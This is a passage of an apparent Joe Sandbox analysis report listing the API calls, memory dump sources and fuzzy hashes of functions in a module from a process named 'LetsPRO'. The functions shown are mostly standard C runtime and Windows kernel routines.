                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000,?,?,00000000), ref: 6C9087FC
                                        • _freea_s.MSVCR100(00000000,?,?,00000000), ref: 6C908805
                                        • malloc.MSVCR100(00000008,?,?,00000000), ref: 6C931480
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: InfoLocale$ByteCharMultiWide_freea_smalloc
                                        • String ID:
                                        • API String ID: 221122905-0
                                        • Opcode ID: b919d6bed76fc983e9a3fa95dd29a7662f51e0991ddd62b42cfad181bd10155e
                                        • Instruction ID: 23d8114a1bc1510a4ef1b601934f8e7477f8a62af30adc111b74f1d950fcb886
                                        • Opcode Fuzzy Hash: b919d6bed76fc983e9a3fa95dd29a7662f51e0991ddd62b42cfad181bd10155e
                                        • Instruction Fuzzy Hash: 6121D371701224AFCF048FA5DC84CAF7BA9EF5A764B20416AF929D2A60D730C950CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100(75918410,?,?,6C9084A6,?,0000000A,00000000), ref: 6C9278FE
                                        • _invalid_parameter_noinfo.MSVCR100(75918410,?,?,6C9084A6,?,0000000A,00000000), ref: 6C927908
                                        • _errno.MSVCR100(0000009C,75918410,?,?,6C9084A6,?,0000000A,00000000), ref: 6C927914
                                        • _invalid_parameter_noinfo.MSVCR100(0000009C,75918410,?,?,6C9084A6,?,0000000A,00000000), ref: 6C92791E
                                        • _errno.MSVCR100(0000009C,75918410,?,?,6C9084A6,?,0000000A,00000000), ref: 6C92792A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2819658684-0
                                        • Opcode ID: affb6a3a858611cb34f892768287f5c79a2042d106464d425874c50a216bed56
                                        • Instruction ID: 266fbfea99a2c688a45ec97298f4abc7904a2c2ebe0ea263dfea31af7b43c213
                                        • Opcode Fuzzy Hash: affb6a3a858611cb34f892768287f5c79a2042d106464d425874c50a216bed56
                                        • Instruction Fuzzy Hash: 4F213439259382CFD3054E28C4D039D3B6AEF67318F10427ED8D58BA86DB71C586C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _malloc_crt.MSVCR100(00000354,?,?,6C94CC10,?,00000000,-00000002,6C9A5BD0), ref: 6C94CB25
                                          • Part of subcall function 6C900B61: malloc.MSVCR100(00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C900B6D
                                        • FindClose.KERNEL32(?,?,?,6C94CC10,?,00000000,-00000002,6C9A5BD0), ref: 6C94CB42
                                        • FindFirstFileExW.KERNEL32(-00000002,00000000,00000000,00000000,00000000,?,?,6C94CC10,?,00000000,-00000002,6C9A5BD0), ref: 6C94CB5B
                                        • FindNextFileW.KERNEL32(?,?,6C94CC10,?,00000000,-00000002,6C9A5BD0), ref: 6C94CB82
                                        • FindClose.KERNEL32(?,6C94CC10,?,00000000,-00000002,6C9A5BD0), ref: 6C94CB92
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Find$CloseFile$FirstNext_malloc_crtmalloc
                                        • String ID:
                                        • API String ID: 1203757345-0
                                        • Opcode ID: e7bac50eb213da9e43c85b847377d669cbae3b6d1051a5dbf27b1578b25a2068
                                        • Instruction ID: 830b61f0d3e84cedaa3690f72b6ff5f6fcdeee0397d16e50ff93ab5525b94a9f
                                        • Opcode Fuzzy Hash: e7bac50eb213da9e43c85b847377d669cbae3b6d1051a5dbf27b1578b25a2068
                                        • Instruction Fuzzy Hash: 2301ED7070A1A0AFCF156BA5EC4C94A7EB9EB067A93348527F414C1964DB32C445DB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1663dcd53dc4231eaa9530a72ffec478fe792084ef3fb11132548a3a66088e98
                                        • Instruction ID: caadd4b129e89309c843803f0516c8ea5b6a93a753896543615ec94beb0d7c5b
                                        • Opcode Fuzzy Hash: 1663dcd53dc4231eaa9530a72ffec478fe792084ef3fb11132548a3a66088e98
                                        • Instruction Fuzzy Hash: 37F0B421C5621985C733952483613AB55E04BB63D5F302D5188B8A3F61BB164547CC8C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetSystemInfo.KERNEL32(?,00000000,00000000,00000000), ref: 6C93BD42
                                        • _memset.LIBCMT(?,00000000,00000114), ref: 6C93BD6B
                                        • GetVersionExW.KERNEL32(?), ref: 6C93BD7C
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C93BD90
                                          • Part of subcall function 6C938140: std::exception::exception.LIBCMT(6C93C1D6,00000114,?), ref: 6C938154
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C93BD9F
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformationEx), ref: 6C93BDE4
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C93BDEB
                                        • GetLastError.KERNEL32 ref: 6C93BDFD
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C93BE16
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C93BE33
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation,?,6C9A0D48,00000000), ref: 6C93BF1E
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C93BF25
                                        • GetLastError.KERNEL32 ref: 6C93BF31
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C93BF4A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AddressConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency::unsupported_os::unsupported_osErrorHandleLastModuleProc$ExceptionInfoSystemThrowVersion_memsetstd::exception::exception
                                        • String ID: GetLogicalProcessorInformation$GetLogicalProcessorInformationEx$bad allocation$kernel32.dll
                                        • API String ID: 2475737160-1310109495
                                        • Opcode ID: 832c6828f3ca8d298cd1b57a5e27dbffcc92d2a933d2cf38085655dd169574b5
                                        • Instruction ID: 4c5b76a6811d12b49c0a391ca8d7259ae8671045d0c865d5d44866d42bf6d90a
                                        • Opcode Fuzzy Hash: 832c6828f3ca8d298cd1b57a5e27dbffcc92d2a933d2cf38085655dd169574b5
                                        • Instruction Fuzzy Hash: 55C1C5716096A19FC714DFA5D848A5E77F8BFC6308F209A2EE05CD2A40D734D509CB5B
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: NameName::Name::operator+operator+
                                        • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$const$double$long $signed $unsigned $void$volatile$wchar_t
                                        • API String ID: 2937105810-1531502760
                                        • Opcode ID: a33fd763dadcff665a81455ac638cfd3bccb5ae673bb4a511b4b36e4bc2784c5
                                        • Instruction ID: bec6b65cdbca62f12dbeac9f611bde037f13c63437eb7561b7924fe07222d886
                                        • Opcode Fuzzy Hash: a33fd763dadcff665a81455ac638cfd3bccb5ae673bb4a511b4b36e4bc2784c5
                                        • Instruction Fuzzy Hash: F7A1E6B2B0D109EACF14CEA8D880AEC7778AF66314F10859EE460E7F91D731DA45CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _isatty.MSVCR100(?,?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002), ref: 6C90EBD7
                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E), ref: 6C90EC08
                                        • GetLastError.KERNEL32 ref: 6C90F0E5
                                        • __doserrno.MSVCR100(00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?), ref: 6C92FDFC
                                        • _errno.MSVCR100(00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?), ref: 6C92FE03
                                        • _invalid_parameter_noinfo.MSVCR100(00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?), ref: 6C92FE0E
                                        • __doserrno.MSVCR100(?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0), ref: 6C92FE29
                                        • _errno.MSVCR100(?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0), ref: 6C92FE31
                                        • _invalid_parameter_noinfo.MSVCR100(?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0), ref: 6C92FE3C
                                        • __lseeki64_nolock.LIBCMT ref: 6C92FE4D
                                        • _getptd.MSVCR100(?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0), ref: 6C92FE67
                                        • GetConsoleMode.KERNEL32(?,?,?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002), ref: 6C92FE85
                                        • GetConsoleCP.KERNEL32(?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?), ref: 6C92FEA5
                                        • isleadbyte.MSVCR100(00000000), ref: 6C92FF15
                                        • __fassign.LIBCMT(?,?,00000002), ref: 6C92FF3F
                                        • __fassign.LIBCMT(?,?,00000001), ref: 6C92FF63
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6C92FF95
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6C92FFBE
                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C930017
                                        • _putwch_nolock.MSVCR100(?), ref: 6C93007A
                                        • _putwch_nolock.MSVCR100(0000000D), ref: 6C9300A7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: FileWrite$Console__doserrno__fassign_errno_invalid_parameter_noinfo_putwch_nolock$ByteCharErrorLastModeMultiWide__lseeki64_nolock_getptd_isattyisleadbyte
                                        • String ID:
                                        • API String ID: 1737003884-0
                                        • Opcode ID: 57d6d8f93b867ecec42be67612613c8405bcec01682efae99b4f7a8b6830dace
                                        • Instruction ID: 129f239db7019bda92899d1b96c17f711fb3bf1b3d1177409601912dd0c8125f
                                        • Opcode Fuzzy Hash: 57d6d8f93b867ecec42be67612613c8405bcec01682efae99b4f7a8b6830dace
                                        • Instruction Fuzzy Hash: 69127D75B06268CFDB218F69CC80BE977B8BB06318F1415D9E45AD6E85D730DA80CF92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C9134F7
                                        • _errno.MSVCR100 ref: 6C913501
                                        • _wspawnve.MSVCR100(?,?,?,?), ref: 6C913512
                                          • Part of subcall function 6C913408: wcsrchr.MSVCR100(?,0000005C), ref: 6C913445
                                          • Part of subcall function 6C913408: wcsrchr.MSVCR100(?,0000002F,?,0000005C), ref: 6C91344F
                                          • Part of subcall function 6C913408: wcsrchr.MSVCR100(00000000,0000002E), ref: 6C91346E
                                          • Part of subcall function 6C913408: _waccess_s.MSVCR100(?,00000000), ref: 6C913482
                                        • _errno.MSVCR100 ref: 6C913526
                                        • _errno.MSVCR100 ref: 6C91352F
                                        • _errno.MSVCR100 ref: 6C913552
                                        • _errno.MSVCR100 ref: 6C9284E9
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C9284F4
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C928507
                                        • _errno.MSVCR100 ref: 6C928514
                                        • wcschr.MSVCR100(?,0000002F), ref: 6C928527
                                        • _wdupenv_s.MSVCR100(?,00000000,PATH), ref: 6C928540
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C92855A
                                        • _calloc_crt.MSVCR100(00000104,00000002), ref: 6C928570
                                        • _wcslen.LIBCMT(00000000), ref: 6C928599
                                        • wcscat_s.MSVCR100(00000000,00000104,6C9330B8), ref: 6C9285B7
                                        • _wcslen.LIBCMT(00000000), ref: 6C9285C4
                                        • _wcslen.LIBCMT(?,00000000), ref: 6C9285CF
                                        • wcscat_s.MSVCR100(00000000,00000104,?), ref: 6C9285ED
                                        • _errno.MSVCR100 ref: 6C9285FD
                                        • _wspawnve.MSVCR100(?,00000000,?,?), ref: 6C92860E
                                        • _errno.MSVCR100 ref: 6C928622
                                        • __doserrno.MSVCR100 ref: 6C92862C
                                        • free.MSVCR100(00000000), ref: 6C92867B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_wcslenwcsrchr$_invalid_parameter_noinfo_wspawnvewcscat_s$__doserrno__invoke_watson_calloc_crt_waccess_s_wdupenv_sfreewcschr
                                        • String ID: PATH
                                        • API String ID: 3726462291-1036084923
                                        • Opcode ID: 13e0fe1a4ea00db28825c231d71db9e39c80baa0638b4ef473c3cf0923987226
                                        • Instruction ID: b82aa6210612920570e7d49d76d1ac7ff564745fe252c5d65019683d933000c5
                                        • Opcode Fuzzy Hash: 13e0fe1a4ea00db28825c231d71db9e39c80baa0638b4ef473c3cf0923987226
                                        • Instruction Fuzzy Hash: E8516771A08508EFCF255F79CC419EE3778FF2572CB20065AE82897E90EB35CA448662
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C910EAE
                                        • _waccess_s.MSVCR100(?,00000000), ref: 6C910EB8
                                          • Part of subcall function 6C90240B: GetFileAttributesW.KERNEL32(?), ref: 6C90242C
                                        • _errno.MSVCR100 ref: 6C910EC5
                                        • _wdupenv_s.MSVCR100(?,00000000,?), ref: 6C910EE8
                                          • Part of subcall function 6C910CB7: _lock.MSVCR100(00000007,6C910D28,0000000C), ref: 6C910CC5
                                        • _wcslen.LIBCMT(?), ref: 6C910F0D
                                        • _errno.MSVCR100(00000000,00000000,00000000), ref: 6C910F30
                                        • _wcslen.LIBCMT(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C910F8A
                                        • wcscpy_s.MSVCR100(00000000,00000002,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C910FD3
                                        • _waccess_s.MSVCR100(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C910FEA
                                        • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C91100D
                                        • wcscpy_s.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C911027
                                        • free.MSVCR100(?), ref: 6C911063
                                        • _errno.MSVCR100 ref: 6C93112C
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C931136
                                        • _wfullpath.MSVCR100(?,?,?), ref: 6C93114F
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C931175
                                        • _wcslen.LIBCMT(?,00000000,00000000,00000000,00000000,00000000), ref: 6C931180
                                        • _calloc_crt.MSVCR100(00000002,00000002,?,00000000,00000000,00000000,00000000,00000000), ref: 6C93118C
                                        • _errno.MSVCR100(?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C9311A7
                                        • _errno.MSVCR100(?,?,?,00000000,00000000,00000000), ref: 6C9311C2
                                        • _wcslen.LIBCMT(?,?,?,?,00000000,00000000,00000000), ref: 6C9311D2
                                        • _calloc_crt.MSVCR100(00000002,00000002,?,?,?,?,00000000,00000000,00000000), ref: 6C9311DE
                                        • _errno.MSVCR100 ref: 6C931217
                                        • _errno.MSVCR100 ref: 6C931222
                                        • free.MSVCR100(?), ref: 6C931234
                                        • free.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C931258
                                        • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C93125E
                                        • free.MSVCR100(?), ref: 6C931271
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_wcslenfree$_calloc_crt_waccess_swcscpy_s$AttributesFile__invoke_watson_invalid_parameter_noinfo_lock_wdupenv_s_wfullpath
                                        • String ID:
                                        • API String ID: 1320518012-0
                                        • Opcode ID: a61ebba961889ae9fb6feea2326fbd3f36b675912022fe59a55431f9645e4f77
                                        • Instruction ID: f6579992c89e42eb6c4523a81dad0fbd16ee123c5972b9b2cb6b80299a95d65b
                                        • Opcode Fuzzy Hash: a61ebba961889ae9fb6feea2326fbd3f36b675912022fe59a55431f9645e4f77
                                        • Instruction Fuzzy Hash: 2F91A070E442689BCF659F649C897DD77B8AF2A308F1011E9D408E7A60EB31CE848F95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _lock.MSVCR100(00000007,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C9163A2
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • __tzname.MSVCR100(6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C9163AB
                                        • _get_timezone.MSVCR100(?,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C9163B7
                                        • _get_daylight.MSVCR100(6C9169C5,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C9163C9
                                        • _get_dstbias.MSVCR100(00000008,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C9163DB
                                        • ___lc_codepage_func.MSVCR100(6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C9163E9
                                          • Part of subcall function 6C911D24: _strlen.LIBCMT(00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D42
                                          • Part of subcall function 6C911D24: _strlen.LIBCMT(00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D51
                                          • Part of subcall function 6C911D24: __fassign.LIBCMT(00000000,00000000,00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D6D
                                        • GetTimeZoneInformation.KERNEL32(6C9A5DE8,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C916430
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,6C9A5DEC,00000000,?,0000003F,00000000,?), ref: 6C9164AE
                                        • WideCharToMultiByte.KERNEL32(000000FF,00000000,6C9A5E40,000000FF,?,0000003F,00000000,?), ref: 6C9164E1
                                        • __timezone.MSVCR100 ref: 6C916507
                                        • __daylight.MSVCR100 ref: 6C916511
                                        • __dstbias.MSVCR100 ref: 6C91651B
                                        • strcmp.MSVCR100(00000000,00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A19
                                        • free.MSVCR100(00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A32
                                        • _strlen.LIBCMT(00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A39
                                        • _malloc_crt.MSVCR100(00000001,00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A40
                                        • _strlen.LIBCMT(00000000,00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A56
                                        • strcpy_s.MSVCR100(00000001,00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A64
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A79
                                        • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A7F
                                        • strncpy_s.MSVCR100(?,00000040,00000000,00000003), ref: 6C929A9A
                                        • atol.MSVCR100(-00000003), ref: 6C929AB7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _strlen$ByteCharMultiWidefree$CriticalEnterInformationSectionTimeZone___lc_codepage_func__daylight__dstbias__fassign__invoke_watson__timezone__tzname_get_daylight_get_dstbias_get_timezone_lock_malloc_crtatolstrcmpstrcpy_sstrncpy_s
                                        • String ID:
                                        • API String ID: 3174396702-0
                                        • Opcode ID: 175b3a8a0f7a5b23cea234ca01cc71a5ce9f71817720ef80b26ea28134160a3d
                                        • Instruction ID: 6d98bdcf5916807d1d1590adcbb3efa4bb01fe654adab3646a1c5e3d326ca2a7
                                        • Opcode Fuzzy Hash: 175b3a8a0f7a5b23cea234ca01cc71a5ce9f71817720ef80b26ea28134160a3d
                                        • Instruction Fuzzy Hash: 7491F672E1C248AFDB009FA9D8819DDBBF9EF2A318B35002AD494E7E54D734C846CB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BA6C
                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 6C90BA89
                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6C90BA96
                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6C90BAA3
                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 6C90BAB0
                                        • TlsAlloc.KERNEL32(?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BAEC
                                        • TlsSetValue.KERNEL32(00000000,?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB07
                                        • __init_pointers.LIBCMT ref: 6C90BB11
                                          • Part of subcall function 6C90BA31: _encoded_null.MSVCR100(7591DFB0,6C90BB16,?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BA34
                                          • Part of subcall function 6C90BA31: __initp_misc_winsig.LIBCMT ref: 6C90BA54
                                        • EncodePointer.KERNEL32(?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB22
                                        • EncodePointer.KERNEL32(?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB2F
                                        • EncodePointer.KERNEL32(?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB3C
                                        • EncodePointer.KERNEL32(?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB49
                                        • DecodePointer.KERNEL32(?,?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB6A
                                        • _calloc_crt.MSVCR100(00000001,00000214,?,?,6C90B913,6C901E10,00000008,6C901E46,00000001,?), ref: 6C90BB7F
